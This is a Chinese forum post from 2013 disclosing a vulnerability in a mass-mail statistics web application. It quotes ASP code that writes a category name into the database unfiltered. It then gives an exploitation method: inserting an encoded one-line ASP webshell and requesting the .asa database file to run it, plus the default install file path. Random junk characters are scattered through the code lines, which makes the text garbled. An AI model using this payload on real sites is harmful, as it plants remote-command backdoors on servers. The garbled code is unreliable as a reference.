找回密码
 立即注册
查看: 3033|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp . X. P2 {  Q* Y5 `: O+ T7 M

! o8 j% N/ N9 lIF Request.QueryString("Action")="del" Then
* ?3 d+ L& O3 G& IID=Request.QueryString("ID") # c! ?% u" ]8 S0 Z$ R
IF Countss ("tui","Fenlei",ID )<>0 then 5 P2 y1 o  ]' ?6 n4 c
'略
- v. m$ C7 _. }1 @IF Request.QueryString("Action")="Add" Then
1 w0 Y  T) D) J; UTname=Request.Form("Typename") 3 F9 ]" i! W' s
Set Rs=Server.CreateObject("adodb.Recordset") $ X6 |- _  d4 v, q* Z
Sql="Select * From Fenlei Order by id Desc "
3 s) @7 n, d% G/ Q6 X) q' k& }Rs.Open Sql,Conn,1,3 ) I% p1 K0 K. u
Rs.Addnew
- Q/ Z+ ]3 Z0 Z9 A# \  vRs("Typename")=Tname * Z0 M( M- t' R6 O6 \# W5 E
'略 # O0 r$ V  C" f3 r0 r0 n0 W2 R; L
Set Rs=Server.CreateObject("adodb.Recordset") * L: c  k( f7 _8 Q/ K
Sql="Select * From Fenlei Order by id Desc " + i: G% Q- Q+ t. Z7 e# ]
Rs.Open Sql,Conn,1,1 & k% R: E% R$ j5 B1 u- g; s9 F2 S
'略 - @1 m& x8 \' J- a
%>
0 ^: E5 o: c5 V: _
2 v5 i7 K3 K$ Y' q  p2 u. F 8 y/ J$ g. l6 ?. e6 Y9 V

8 G. }% `0 ]' }  y没有过滤,直接写入数据库。
% o1 ^9 h' ~2 a
% ?- W% j  e) O& _& s% `利用方法:4 K8 ^7 k6 j4 B
8 H7 o* H# Q7 A  S( w+ B$ P
插入:┼攠數畣整爠煥敵瑳∨≡┩>. v! ]# u' r+ W& @
7 k* }7 \- R+ P. @- j
) u8 g* ~: o' n. ^: s9 d
连接: http://www.xxx.com/###tongbaner.asa , K% t  c2 `! u& I& [/ V: d+ f: |! b: w
'默认安装文件: : H8 @( r, G, F' L2 d
'install.asp
; P( T: h& \4 S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表